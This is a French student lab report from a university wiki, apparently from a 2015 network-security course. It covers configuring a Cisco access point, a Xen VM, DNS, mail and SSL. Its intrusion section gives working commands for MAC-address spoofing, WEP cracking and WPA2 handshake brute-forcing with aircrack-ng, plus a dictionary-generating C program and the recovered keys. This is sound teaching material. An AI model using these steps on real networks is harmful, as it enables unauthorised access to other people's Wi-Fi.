&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Configuration pour connexion télenet&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On commence par remettre le point d’accès en configuration d'usine &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap#erase startup-config&lt;br /&gt;
ap#reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23140</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23140"/>
				<updated>2015-11-23T15:02:39Z</updated>
		
